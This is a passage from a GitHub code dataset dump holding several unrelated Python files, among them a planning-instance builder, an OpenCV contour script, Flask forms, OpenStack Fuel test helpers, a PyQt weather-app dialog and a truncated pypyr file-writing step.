InstanceData\nfrom learner.src.util.command import create_experiment_workspace\nfrom learner.src.util.file_system import remove_directory\n\n\nclass InstanceDataFactory:\n def make_instance_datas(self, config):\n cwd = os.getcwd()\n vocabulary_info = None\n instance_datas = []\n for instance_information in config.instance_informations:\n logging.info(f\"Constructing InstanceData for filename {instance_information.filename}\")\n create_experiment_workspace(instance_information.workspace, False)\n # change working directory to put planner output files in correct directory\n os.chdir(instance_information.workspace)\n result = dlplan.generate_state_space(str(config.domain_filename), str(instance_information.filename), vocabulary_info, len(instance_datas), config.max_time_per_instance)\n remove_directory(instance_information.workspace)\n print(instance_information.workspace)\n if result.exit_code != dlplan.GeneratorExitCode.COMPLETE:\n continue\n state_space = result.state_space\n if vocabulary_info is None:\n # We obtain the parsed vocabulary from the first instance\n vocabulary_info = state_space.get_instance_info().get_vocabulary_info()\n domain_data = DomainDataFactory().make_domain_data(config, vocabulary_info)\n if len(state_space.get_states()) > config.max_states_per_instance:\n continue\n goal_distances = state_space.compute_goal_distances()\n if goal_distances.get(state_space.get_initial_state_index(), None) is None:\n print(\"Unsolvable.\")\n continue\n elif set(state_space.get_states().keys()) == set(state_space.get_goal_state_indices()):\n print(\"Trivially solvable.\")\n continue\n elif not config.closed_Q and state_space.get_initial_state_index() in set(state_space.get_goal_state_indices()):\n print(\"Initial state is goal.\")\n continue\n else:\n print(\"Num states:\", len(state_space.get_states()))\n instance_data = InstanceData(len(instance_datas), domain_data, dlplan.DenotationsCaches(), instance_information)\n instance_data.set_state_space(state_space, create_dump=True)\n instance_data.set_goal_distances(goal_distances)\n if config.closed_Q:\n instance_data.initial_s_idxs = [s_idx for s_idx in state_space.get_states().keys() if instance_data.is_alive(s_idx)]\n else:\n instance_data.initial_s_idxs = [state_space.get_initial_state_index(),]\n instance_datas.append(instance_data)\n # Sort the instances according to size and fix the indices afterwards\n instance_datas = sorted(instance_datas, key=lambda x : len(x.state_space.get_states()))\n for instance_idx, instance_data in enumerate(instance_datas):\n instance_data.id = instance_idx\n # change back working directory\n os.chdir(cwd)\n return instance_datas, domain_data\n","repo_name":"ipc2023-learning/repo08","sub_path":"learning/learner/src/instance_data/instance_data_factory.py","file_name":"instance_data_factory.py","file_ext":"py","file_size_in_byte":3350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21426426666","text":"import cv2\nimport numpy as np\nfrom imutils import contours as cnts\n# Define square size\nmin_square_size = 987\n# Read Image\nimg = cv2.imread('base6.png')\n# Threshold and find edges\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n# Threshold the image - segment white background from post it notes\n_, thresh = cv2.threshold(gray, 250, 255, cv2.THRESH_BINARY_INV);\n# Find the contours\ncontours, _ = cv2.findContours(thresh,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)\n\n\n# Create a list for post-it images\nimages = []\n# Iterate through the contours in the image\nprint(len(contours))\n\n\n(contours, _) = cnts.sort_contours(contours, method=\"top-to-bottom\")\n\nbins = \"\"\nfor contour in contours:\n area = cv2.contourArea(contour)\n # If the contour is not really small, or really big\n h,w = img.shape[0], img.shape[1]\n if area > min_square_size and area < h*w-(2*(h+w)):\n # Get the four corners of the contour\n epsilon = .1 * cv2.arcLength(contour, True)\n approx = cv2.approxPolyDP(contour, epsilon, True)\n # Draw the point\n # print(approx.shape)\n for point in approx: cv2.circle(img, tuple(point[0]), 2, (255,0,0), 2)\n # Warp it to a square\n pts1 = np.float32(approx)\n pts2 = np.float32([[0,0],[300,0],[300,300],[0,300]])\n M = cv2.getPerspectiveTransform(pts1,pts2)\n dst = cv2.warpPerspective(img,M,(300,300))\n print(dst[10][10][0])\n bins += str(int(dst[10][10][0] == 255))\n # Add the square to the list of images\n images.append(dst.copy())\n# print(len(images))\nprint(bins)\nprint(\"1100100011101010001010111\")\n# Show the complete image with dots on the corners\ncv2.imshow('img', img)\n# cv2.imwrite('/home/stephen/Desktop/corners.png', img)\ncv2.waitKey()\n\n# # Write the images to the desktop\n# idx = 0\n# for image in images:\n# # cv2.imwrite('/home/stephen/Desktop/'+str(idx)+'.png', image)\n# # print(img[20][20])\n# cv2.imshow('img', image)\n# cv2.waitKey()\n # idx += 1\n# cv2.destroyAllWindows()","repo_name":"ethanbond64/chainlink_iris","sub_path":"learningcv/contours.py","file_name":"contours.py","file_ext":"py","file_size_in_byte":2007,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"28278886849","text":"from setuptools import setup, find_packages\nimport codecs\nimport os\n\nhere = os.path.abspath(os.path.dirname(__file__))\n\nwith codecs.open(os.path.join(here, \"README.md\"), encoding=\"utf-8\") as fh:\n long_description = \"\\n\" + fh.read()\n\nVERSION = '1.0'\nDESCRIPTION = 'A powerful os operating system for python with exclusive functions'\n\n# Setting up\nsetup(\n name=\"vidstream\",\n version=VERSION,\n author=\"Aarav Shreshth\",\n author_email=\"aaravshreshth1503@gmail.com\",\n description=DESCRIPTION,\n long_description=\"A powerful os\",\n packages=find_packages(),\n install_requires=['opencv-python', 'pyautogui'],\n keywords=['python', 'video', 'stream', 'video stream', 'camera stream', 'sockets'],\n classifiers=[\n \"Development Status :: 1 - Planning\",\n \"Intended Audience :: Developers\",\n \"Programming Language :: Python :: 3\",\n \"Operating System :: Unix\",\n \"Operating System :: MacOS :: MacOS X\",\n \"Operating System :: Microsoft :: Windows\",\n ]\n)\n","repo_name":"aarav-shreshth/Pyosleep","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"73038177079","text":"\"\"\"Forms for Pet Adoption Agency.\"\"\"\n\nfrom flask_wtf import FlaskForm\nfrom wtforms import StringField, SelectField, FloatField, BooleanField\nfrom wtforms.validators import InputRequired, AnyOf, URL, Optional, NumberRange\n\n\nclass AddPetForm(FlaskForm):\n \"\"\"Form for adding new pets.\"\"\"\n\n name = StringField(\"Pet Name\", validators=[InputRequired()])\n species = SelectField(\"Species\", choices=[(\"cat\", \"Cat\"), (\"dog\", \"Dog\"), (\"porcupine\", \"Porcupine\")], validators=[InputRequired()])\n photo_url = StringField(\"Photo URL\", validators=[URL(), Optional()])\n age = FloatField(\"Age (in human years)\", validators=[NumberRange(min=0, max=30), Optional()])\n notes = StringField(\"Notes\", validators=[Optional()])\n\nclass EditPetForm(FlaskForm):\n \"\"\"Form for editing pets.\"\"\"\n\n photo_url = StringField(\"Photo URL\", validators=[URL(), Optional()])\n notes = StringField(\"Notes\", validators=[Optional()])\n available = BooleanField(\"Available\")","repo_name":"keante032/SB-24.1.15","sub_path":"forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"74361558519","text":"import os\nimport json\nimport sys\nfrom modules.file_helper import FileHelper\nfrom modules.html_loader import HtmlLoader\nfrom modules.extracter import Extracter\n\n\ndef format_print(json_string):\n print(json.dumps(json_string, indent=2, encoding='utf8'))\n\ndef get_content(soup):\n if soup.string is not None:\n return soup.string if soup.string != '\\n' else u''\n\n if len(soup.contents) == 0:\n return u''\n\n values = []\n for item in soup.contents:\n values.extend(get_content(item))\n return values\n\ndef get_cell_content(td_soup):\n if td_soup.string is not None:\n return td_soup.string if td_soup.string != '\\n' else u''\n\n values = []\n for item in td_soup.contents:\n values.extend(get_content(item))\n return u\"\".join(values).replace('\\n', '').replace(u' ', u'')\n\nif __name__ == '__main__':\n # if len(sys.argv) != 2:\n # print(\"Usage: %s \" % sys.argv[0])\n # exit(-1)\n info_id = '3f0a2dd7-1e13-4929-961b-a07808811650' # sys.argv[1]\n\n file_helper = FileHelper()\n html_loader = HtmlLoader()\n extracter = Extracter()\n\n page_dir = \"debug_pages/\"\n # page_path = os.path.join(page_dir, 'a9e29e7b-da58-47cc-a9a4-0d9340a62282' + '.html')\n page_path = os.path.join(page_dir, info_id + '.html')\n\n if not os.path.exists(page_path) or not os.path.isfile(page_path):\n print(\"info id not exists\")\n exit(-2)\n\n soup = html_loader.beautiful_page_content(file_helper.read(page_path))\n detail = extracter.extract_detail(soup)\n format_print(detail)\n list_item = {\n 'tender_id': info_id,\n 'pubdate': '2013-10-28 00:00:00',\n 'page_url': 'http://www.spprec.com/sczw/InfoDetail/Default.aspx?InfoID=' + info_id + '&CategoryNum=005001003',\n 'page_num': 0\n }\n extracter.save_extracted_data(list_item, detail)\n","repo_name":"alvin1/crawler","sub_path":"extract_debug_page.py","file_name":"extract_debug_page.py","file_ext":"py","file_size_in_byte":1845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21936455964","text":"\n##\n# @defgroup dispatcher_package\n# @brief dynamic reloading of user modules, data frames distribution between\n# hardware and the user modules\n#\n#\n# @{\n\n##\n# @defgroup dispatcher\n# @brief reloading of user modules, intercommunication of those modules between\n# hardware\n# @{\n\nfrom hardware import serialHardware\nfrom threading import Thread,Lock\nimport time\nimport commandTable\nfrom aplications import baseClass\nimport imp \nimport os\nimport logging\nimport array\nimport events\nimport inspect, os\nimport config\nimport threading\nimport collections\npath = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe()))) + \"/..\" # script directory\n\n\n##\n# @brief Dynamic reloading user modules and message distribution between\n# hardware and those modules \n#\n# Modules are added/reloaded automatically and on the fly (no restart needed)\n#\n# Only one instance is used in whole application. \nclass dispatcher:\n ##\n # @brief message codes to user readable string conversion table\n _table = {serialHardware.Hardware.NEW_DATA : \"NEW_DATA\", \n serialHardware.Hardware.ERROR: \"ERROR\",\n serialHardware.Hardware.TX_FAILED: \"TX_FAILED\",\n serialHardware.Hardware.TX_FINISHED: \"TX_FINISHED\"}\n\n ## \n # @brief Initialize instance variables, create dedicated thread and\n # create hardware class instance\n def __init__(self):\n ## @brief hardware instance\n self._hw = serialHardware.Hardware(self._handle_events) #hardware connector \n ## @brief dedicated thread\n self._thread = Thread(target=self._loop,name=\"dispatcher\")\n #self._thread.setDaemon(True)\n ## @brief instance logger\n self._log = logging.getLogger(\"root.dispatcher\")\n self._lock = Lock()\n ## @brief list of user modules\n self._objects = {}\n ## @brief command table\n self._command_table = commandTable.commands\n self._log_apps = logging.getLogger(\"root.apps\")\n \n self._var = threading.Event()\n self._var.set()\n pass\n \n ##\n # @brief open hardware and start dedicated thread\n def start(self):\n self._hw.open(config.config_dict[\"usb\"])\n self._thread.start()\n pass\n \n def close(self):\n self._log.debug(\"Closing\")\n self._hw.close()\n self._var.clear()\n \n self._thread.join()\n self._log.debug(\"thread closed\")\n \n self._log.debug(\"stopping timers\")\n for a in self._objects.values():\n f = a[0]\n f.stop_timer()\n \n\n \n ##\n # @brief format serial data to command and payload\n def _format_serial_data(self, args):\n pipe = args[0]\n data = args[1]\n if len(data) < 2:\n self._log.error(\"Invalid tx failed packet - too short payload\")\n return\n command = ord(data[0]) | ord(data[1]) << 8\n data = data[2:len(data)]\n pole = array.array(\"B\")\n pole.fromstring(data.tostring())\n t = (self, pipe, command ,pole)\n return t\n \n ##\n # @brief receive callbacks from @ref hardware class and distribute\n # data to the dynamically imported user modules\n #\n def _handle_events(self, args):\n code = args[0]\n args = args[1]\n \n # tuple with self and data needed by callbacks\n arg = None\n pipe = -1\n if code == self._hw.NEW_DATA:\n #dispatcher, pipe, command, payload\n arg = self._format_serial_data(args)\n pipe = arg[1]\n self._log.debug(\"new packet pipe %d; command %d; load \" + str(arg[3].tolist()),pipe,arg[2])\n if (arg[2] == self.command_table().STARTUP):\n self._log.warning(\"pipe %d (%s) firmware just started-up\" % (pipe,self.command_table().stations[pipe]))\n pass\n elif code == self._hw.TX_FINISHED:\n #pipe number\n # dispatcher, pipe\n arg = (self,args)\n pipe = args\n self._log.debug(\"Packet delivered to pipe %d\", pipe)\n pass\n elif code == self._hw.TX_FAILED:\n #dispatcher, pipe, command , payload\n arg = self._format_serial_data(args)\n pipe = arg[1]\n self._log.warning(\"packet delivery failed %d; command %d; load \" + str(arg[3].tolist()),pipe,arg[2])\n pass\n elif code == self._hw.ERROR:\n #error code\n # dispatcher, erroer code\n arg = (self, args)\n self._log.warning(\"Error from hardware \" + str(args))\n pass\n else:\n self._log.warning(\"_handle_events with invalid serialHardware code\")\n return\n\n exp = self._table[code]\n \n self._lock.acquire()\n for a in self._objects.values():\n f = a[0]\n lst = f.pipe_list\n if not pipe in lst and not code == self._hw.ERROR:\n continue\n \n # helper function table \n vmt = {}\n vmt[self._hw.TX_FAILED] = f.virtual_tx_failed\n vmt[self._hw.TX_FINISHED] = f.virtual_tx_finished\n vmt[self._hw.ERROR] = f.virtual_error\n vmt[self._hw.NEW_DATA] = f.virtual_new_data\n cb = vmt[code]\n\n try:\n if cb is not None:\n # variable number of arguments as tuple\n cb(*arg)\n except:\n self._log.exception(\"Application module \\\"%s\\\" raised exception in \\\"%s\\\" handler\", f._name, exp)\n f._log.exception(\"Raised exception\")\n self._lock.release()\n \n \n ##\n # @brief @ref _thread code checks for changes in user modules and @ref command_table\n # and reloads changed modules or table on the fly\n def _loop(self):\n while self._var.isSet(): \n try:\n self._lock.acquire()\n self._objects = self._get_objects(self._objects)\n try:\n reload(commandTable)\n t = commandTable.commands.REFRESH_PERIOD\n except:\n self._log.exception(\"Error in reloading command table\")\n self._command_table = commandTable.commands\n self._lock.release()\n time.sleep(t)\n except:\n events.events.event.register_exit()\n \n \n ##\n # @brief refresh list of user modules in package @ref aplications\n # search for new modules and dynamically import them and modified modules\n # are dynamically reimported\n def _get_objects(self, objects):\n # @type objects: {}\n filename = os.path.abspath(path + \"/aplications\")\n a = os.listdir(filename)\n a.remove(\"baseClass.py\")\n a.remove(\"__init__.py\")\n lst =[]\n b = \"\"\n for b in a:\n if not b.endswith(\".py\"):\n lst.append(b)\n \n for b in lst:\n a.remove(b)\n \n for b in a:\n name = filename + \"/\" +b\n scrname = b.rstrip(\".py\")\n mtime = os.path.getmtime(name)\n jo = False\n if scrname in objects:\n t = objects[scrname]\n t = t[1]\n if mtime == t:\n continue\n else:\n jo = True\n self._log.info(\"new module \\\"%s\\\" was added\", scrname)\n \n try:\n c = imp.load_source(\"modul\", name)\n c = c.app(scrname)\n tup = (c, mtime)\n objects[scrname] = tup\n except:\n self._log.exception(\"module \\\"%s\\\" raised exception during import\",scrname)\n if jo is False:\n self._log.info(\"module \\\"%s\\\" was changed\", scrname)\n\n \n return objects \n \n ##\n # @brief Used by user modules to send arbitrary data to the wireless modules\n # @param pipe [int] Logical address of wireless module \n # @param command [int] Arbitrary command from @ref command_table\n # @param data [int/character array] User data array of bytes or integer which is automatically\n # converted to the byte of array\n # @param integerLength [int] If data is integer it will be converted to specified \n # number of bytes\n def send_packet(self, pipe, command, data = None, integerLength = None):\n # @type pipe: int \n # @type command: int\n # @type data: array.array(\"B\") \n payload = array.array(\"c\")\n \n if data is not None: \n if isinstance(data,array.array):\n payload.fromstring(data.tostring())\n if isinstance(data, int):\n t = data \n if type(integerLength) is int:\n while integerLength > 0:\n payload.append(chr(t & 0xff))\n t >>= 8\n integerLength -= 1\n \n else: \n while t:\n payload.append(chr(t & 0xff))\n t >>= 8\n \n command |= self._command_table.WRITE_FLAG \n payload.insert(0,chr((command >> 8) & 0xff))\n payload.insert(0,chr(command & 0xff))\n \n self._log.info(\"send ack payload pipe %d, command %d, load %s\",pipe,command,str(data))\n self._log.info(\"send ack payload raw: %s\" ,str(payload))\n self._hw.put_ack_payload(pipe, payload)\n \n pass\n \n ##\n # @brief returns command table which is automatically reloaded after modification\n # on the fly\n @property\n def command_table(self):\n return self._command_table\n \n #@}\n \n#@}\n","repo_name":"kubanecxxx/homeautomation","sub_path":"openwrt/python/homeAutomation/dispatcher/dispatcher.py","file_name":"dispatcher.py","file_ext":"py","file_size_in_byte":9822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"39505227876","text":"import random\n\nfrom wildcard.util.parse_annotations import parse_all\n\n\"\"\"\nVariety of utils for preparing data for model\n\"\"\"\n\nrandom.seed(42)\n\ndef split_data(utterances, split=[0.8, 0.2]):\n \"\"\"\n Split data into train/test according to provided ratio\n :param split: Split to use for train/test\n :return:\n \"\"\"\n random.shuffle(utterances)\n bound = int(len(utterances) * split[0])\n train = utterances[:bound]\n test = utterances[bound:]\n return train, test\n","repo_name":"mihail911/wildcard","sub_path":"wildcard/util/data_utils.py","file_name":"data_utils.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33484889667","text":"import csv\r\na=0\r\nwith open(\"Marks.csv\",\"r\")as f:\r\n csv=csv.reader(f)\r\n '''for row in csv:\r\n print(row)'''\r\n '''col=next(csv)\r\n print(col)'''\r\n for i in csv:\r\n a+=1\r\n print(\"No of row:\",a)\r\n \r\n\r\n","repo_name":"RaaghavNaraayan/Skl-work","sub_path":"readmarks.py","file_name":"readmarks.py","file_ext":"py","file_size_in_byte":228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"11611235369","text":"\n# test12\n\nimport math\n\n\n# ①\nclass Apple:\n\t# インスタンス化\n\t# ①色、②重さ、③産地、④状態\n\tdef __init__(self, color, weight, origin, status):\n\t\tself.color = color\n\t\tself.weight = weight\n\t\tself.origin = origin\n\t\tself.status = status\n\n# 実処理\napple = Apple(\"red\", 400, \"青森\", \"flesh\")\nprint(apple.color)\nprint(apple.weight)\nprint(apple.origin)\nprint(apple.status)\n\n\n\n# ②\nclass Circle:\n\tdef __init__(self, rad):\n\t\tself.radius = rad\n\n\t# 円の面積を算出\n\tdef area(self):\n\t\treturn (self.radius * self.radius) * math.pi\n\n# 実処理\ncircle = Circle(5)\nprint(circle.radius)\nprint(circle.area())\n\n\n\n# ③\nclass Triangle:\n\tdef __init__(self, l, h):\n\t\tself.length = l\n\t\tself.height = h\n\n\t# 三角形の面積を算出\n\tdef area(self):\n\t\treturn (self.length * self.height) / 2\n\n# 実処理\ntriangle = Triangle(10, 4)\nprint(triangle.length)\nprint(triangle.height)\nprint(triangle.area())\n\n\n\n# ④\nclass Hexagon:\n\t# 正六角形の1辺の長さを設定\n\tdef __init__(self, l):\n\t\tself.len = l\n\n\t# 外周の長さを算出\n\tdef calculate_perimeter(self):\n\t\treturn self.len * 6\n\n# 実処理\nhexagon = Hexagon(6)\nprint(hexagon.len)\nprint(hexagon.calculate_perimeter())\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"nomura-takahiro/study","sub_path":"test/test12.py","file_name":"test12.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30772048793","text":"import inspect\nimport time\nimport traceback\n\nfrom proboscis import asserts\n\nfrom fuelweb_test import logger\nfrom fuelweb_test import logwrap\nfrom fuelweb_test import settings\n\n\n@logwrap\ndef get_yaml_to_json(node_ssh, file):\n cmd = (\"python -c 'import sys, yaml, json; json.dump(\"\n \"yaml.load(sys.stdin),\"\n \" sys.stdout)' < {0}\").format(file)\n err_res = ''\n res = node_ssh.execute(cmd)\n err_res.join(res['stderr'])\n asserts.assert_equal(\n res['exit_code'], 0,\n 'Command {0} execution failed '\n 'with message {1}'.format(cmd, err_res))\n return res['stdout']\n\n\n@logwrap\ndef nova_service_get_pid(node_ssh, nova_services=None):\n pid_dict = {}\n for el in nova_services:\n cmd = \"pgrep {0}\".format(el)\n pid_dict[el] = node_ssh.execute(cmd)['stdout']\n logger.debug('current dict is {0}'. format(pid_dict))\n return pid_dict\n\n\n@logwrap\ndef check_if_service_restarted(node_ssh, services_list=None,\n pattern='(re)?start', skip=0):\n if services_list:\n # from the log file {2}, scan all lines after line {0} with the\n # pattern {1} to find restarted services, print their names to stdout\n cmd = (\"awk 'NR >= {0} && /{1}/ {{print $11}}' {2}\"\n .format(skip, pattern, '/var/log/puppet.log'))\n res = ''.join(node_ssh.execute(cmd)['stdout'])\n logger.debug('Next services were restarted {0}'.format(res))\n for service in services_list:\n asserts.assert_true(\n any(service in x for x in res),\n 'Seems service {0} was not restarted {1}'.format(service, res))\n\n\n@logwrap\ndef pull_out_logs_via_ssh(admin_remote, name,\n logs_dirs=('/var/log/', '/root/', '/etc/fuel/')):\n def _compress_logs(_dirs, _archive_path):\n cmd = 'tar --absolute-names --warning=no-file-changed -czf {t} {d}'.\\\n format(t=_archive_path, d=' '.join(_dirs))\n result = admin_remote.execute(cmd)\n if result['exit_code'] != 0:\n logger.error(\"Compressing of logs on master node failed: {0}\".\n format(result))\n return False\n return True\n\n archive_path = '/var/tmp/fail_{0}_diagnostic-logs_{1}.tgz'.format(\n name, time.strftime(\"%Y_%m_%d__%H_%M_%S\", time.gmtime()))\n\n try:\n if _compress_logs(logs_dirs, archive_path):\n if not admin_remote.download(archive_path, settings.LOGS_DIR):\n logger.error((\"Downloading of archive with logs failed, file\"\n \"wasn't saved on local host\"))\n except Exception:\n logger.error(traceback.format_exc())\n\n\n@logwrap\ndef store_astute_yaml(env):\n func_name = get_test_method_name()\n for node in env.nodes().slaves:\n nailgun_node = env.fuel_web.get_nailgun_node_by_devops_node(node)\n if node.driver.node_active(node) and nailgun_node['roles']:\n try:\n remote = env.get_ssh_to_remote_by_name(node.name)\n filename = '{0}/{1}-{2}.yaml'.format(settings.LOGS_DIR,\n func_name, node.name)\n logger.info(\"Storing {0}\".format(filename))\n if not remote.download('/etc/astute.yaml', filename):\n logger.error(\"Downloading 'astute.yaml' from the node \"\n \"{0} failed.\".format(node.name))\n except Exception:\n logger.error(traceback.format_exc())\n\n\n@logwrap\ndef get_test_method_name():\n # Find the name of the current test in the stack. It can be found\n # right under the class name 'NoneType' (when proboscis\n # run the test method with unittest.FunctionTestCase)\n stack = inspect.stack()\n method = ''\n for m in stack:\n if 'self' in m[0].f_locals:\n if m[0].f_locals['self'].__class__.__name__ == 'NoneType':\n break\n method = m[3]\n return method\n","repo_name":"FIWARE/ops.Fuel-main-dev","sub_path":"fuelweb_test/helpers/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"28906523028","text":"from setuptools import setup, Extension\nfrom torch.utils import cpp_extension\n\ntorch_library_paths = cpp_extension.library_paths(cuda=False)\n\n\ndef build(setup_kwargs):\n \"\"\"\n This function is mandatory in order to build the extensions.\n \"\"\"\n setup_kwargs.update({\n 'ext_modules': [\n cpp_extension.CppExtension(\n 'torch_persistent_homology.persistent_homology_cpu',\n ['torch_persistent_homology/perisistent_homology_cpu.cpp'],\n extra_link_args=[\n '-Wl,-rpath,' + library_path\n for library_path in torch_library_paths]\n )\n ],\n 'cmdclass': {\n 'build_ext': cpp_extension.BuildExtension\n }\n })\n","repo_name":"ExpectationMax/torch_persistent_homology","sub_path":"build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"74910492601","text":"from PyQt5 import QtGui, QtCore, QtWidgets\nfrom PyQt5.QtGui import QIcon\nfrom PyQt5.QtWidgets import QPushButton, QLabel, QMessageBox, QRadioButton, QLineEdit, QCheckBox\n\nimport MainWindow as main\nimport geocoder\n\nclass ChangeCityWindow(QtWidgets.QDialog):\n def __init__(self):\n QtWidgets.QWidget.__init__(self)\n self.setWindowTitle('Change The City — Weathr')\n self.top = 200\n self.left = 350\n self.width = 400\n self.height = 400\n self.cityName = ''\n\n self.InitUI()\n self.setWindowIcon(QIcon('Images/weather.ico'))\n self.setGeometry(self.left, self.top, self.width, self.height)\n\n\n def InitUI(self):\n\n #create a styled header\n self.header = QLabel(self)\n self.header.setText('

Change the City

')\n self.header.move(130, 10)\n\n #create the form and the explination label\n self.cityLabel = QLabel(self)\n self.cityLabel.setText('Change the City:')\n self.cityLabel.move(15, 30)\n\n #create input field\n self.cityInputField = QLineEdit(self)\n self.cityInputField.resize(180, 32)\n self.cityInputField.move(15, 55)\n self.cityInputField.setPlaceholderText('Enter a City...')\n\n #create header for settings\n self.headerSettings = QLabel(self)\n self.headerSettings.setText('

Location Settings

')\n self.headerSettings.move(15, 100)\n\n #create settings for the location settings\n self.locationLabel = QLabel(self)\n self.locationLabel.setText('NOTE: Location tracking is dependent on the internet and the IP. Note that the IP might not contain an accurate location. Also, if this is checked, whatever you put into the text field above will be ignored.')\n self.locationLabel.setWordWrap(True)\n self.locationLabel.move(15, 130)\n\n self.turnOnLocationTracking = QCheckBox(self)\n self.turnOnLocationTracking.setText('Track location instead')\n self.turnOnLocationTracking.move(15, 220)\n self.turnOnLocationTracking.stateChanged.connect(self.getLocation)\n self.turnOnLocationTracking.stateChanged.connect(self.cityInputField.setDisabled)\n\n self.coordinatesLabel = QLabel(self)\n self.coordinatesLabel.move(15, 245)\n self.coordinatesLabel.setText('

Your Location will Be Displayed Here

')\n self.coordinatesLabel.resize(600, 30)\n\n #create the save btn\n self.saveBtn = QPushButton(self)\n self.saveBtn.setText('Save Preferences')\n self.saveBtn.move(15, 360)\n self.saveBtn.clicked.connect(self.saveFunction)\n\n #create the cancel Btn\n self.cancelBtn = QPushButton(self)\n self.cancelBtn.setText('Cancel')\n self.cancelBtn.move(300, 360)\n self.cancelBtn.clicked.connect(self.cancel)\n\n\n def getLocation(self):\n\n self.g = geocoder.ip('me')\n print(self.g.latlng)\n self.coordinatesLabel.setText('

Your Location Is In ' +str(self.g.state)+ ', ' +str(self.g.city)+ '

')\n\n\n def saveFunction(self):\n\n #self.reloadWeather()\n #self.close()\n\n #check \"weather\" or not (hahaha get it? weather?) the location button is checked\n if self.turnOnLocationTracking.isChecked():\n\n #write to the text file\n with open('src/saves/startupcity.txt', 'w') as f:\n f.write(self.g.city)\n\n self.reloadWeather()\n self.close()\n \n #run if location tracking isn't checked.\n elif self.turnOnLocationTracking.isChecked() != True:\n\n if self.cityInputField.text() == '' or self.cityInputField.text() == ' ':\n self.dlg = QMessageBox.critical(self, 'Blank Form', 'Fill in the form. The form cannont be blank',\n QMessageBox.Ok)\n self.cancelBtn.setDisabled(True)\n self.mainGetWeather.close()\n self.show()\n\n else:\n #write to text file\n # write to the text file\n with open('src/saves/startupcity.txt', 'w') as f:\n f.write(self.cityInputField.text())\n\n self.reloadWeather()\n self.close()\n def reloadWeather(self):\n\n self.mainGetWeather = main.Window()\n self.mainGetWeather.getWeather()\n self.close()\n\n def cancel(self):\n self.mainGetWeather = main.Window()\n self.close()\n self.mainGetWeather.show()","repo_name":"henrybungee/weathr-forecast","sub_path":"src/ChangeCityWindow.py","file_name":"ChangeCityWindow.py","file_ext":"py","file_size_in_byte":4520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"7125213830","text":"from pendulum import datetime\nfrom airflow.decorators import dag\nfrom airflow.operators.bash import BashOperator\n\nPATH_TO_DBT_PROJECT = \"\"\nPATH_TO_DBT_VENV = \"\"\n\n\n@dag(\n start_date=datetime(2023, 3, 23),\n schedule=\"@daily\",\n catchup=False,\n)\ndef simple_dbt_dag():\n dbt_run = BashOperator(\n task_id=\"dbt_run\",\n bash_command=\"source $PATH_TO_DBT_VENV && dbt run --models .\",\n env={\"PATH_TO_DBT_VENV\": PATH_TO_DBT_VENV},\n cwd=PATH_TO_DBT_PROJECT,\n )\n\n\nsimple_dbt_dag()\n","repo_name":"astronomer/docs","sub_path":"code-samples/dags/airflow-dbt/airflow_dbt_bashoperator.py","file_name":"airflow_dbt_bashoperator.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"40"} +{"seq_id":"416049704","text":"# -*- coding: utf-8 -*-\nfrom conans import ConanFile\nfrom conans import CMake\n\nclass ConanRecipe(ConanFile):\n python_requires = 'common/1.0.0@mevislab/stable'\n python_requires_extend = 'common.CommonRecipe'\n\n _cmake = None\n\n def _configure_cmake(self):\n if not self._cmake:\n self.create_cmake_wrapper()\n self._cmake = CMake(self)\n self._cmake.definitions[\"CMAKE_DEBUG_POSTFIX\"] = \"d\"\n self._cmake.definitions[\"BUILD_SHARED_LIBS\"] = True\n\n self._cmake.configure()\n\n return self._cmake\n\n\n def build(self):\n cmake = self._configure_cmake()\n cmake.build()\n\n\n def package(self):\n cmake = self._configure_cmake()\n cmake.install()\n\n self.copy(\"*.pdb\", src=\"bin\", dst=\"bin\")\n\n self.patch_binaries()\n self.default_package()\n","repo_name":"MeVisLab/mevislabthirdparty","sub_path":"recipes/fme/spline/conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"40"} +{"seq_id":"33677679283","text":"\"\"\"pypyr step that writes payload out to a yaml file.\"\"\"\nimport os\nimport logging\nimport pypyr.yaml\n\n# logger means the log level will be set correctly\nlogger = logging.getLogger(__name__)\n\n\ndef run_step(context):\n \"\"\"Write payload out to yaml file.\n\n Args:\n context: pypyr.context.Context. Mandatory.\n The following context keys expected:\n - fileWriteYaml\n - path. mandatory. path-like. Write output file to\n here. Will create directories in path for you.\n - payload. optional. Write this to output file. If not\n specified, output entire context.\n\n Returns:\n None.\n\n Raises:\n pypyr.errors.KeyNotInContextError: fileWriteYaml or\n fileWriteYaml['path'] missing in context.\n pypyr.errors.KeyInContextHasNoValueError: fileWriteYaml or\n fileWriteYaml['path'] exists but is None.\n\n \"\"\"\n logger.debug(\"started\")\n 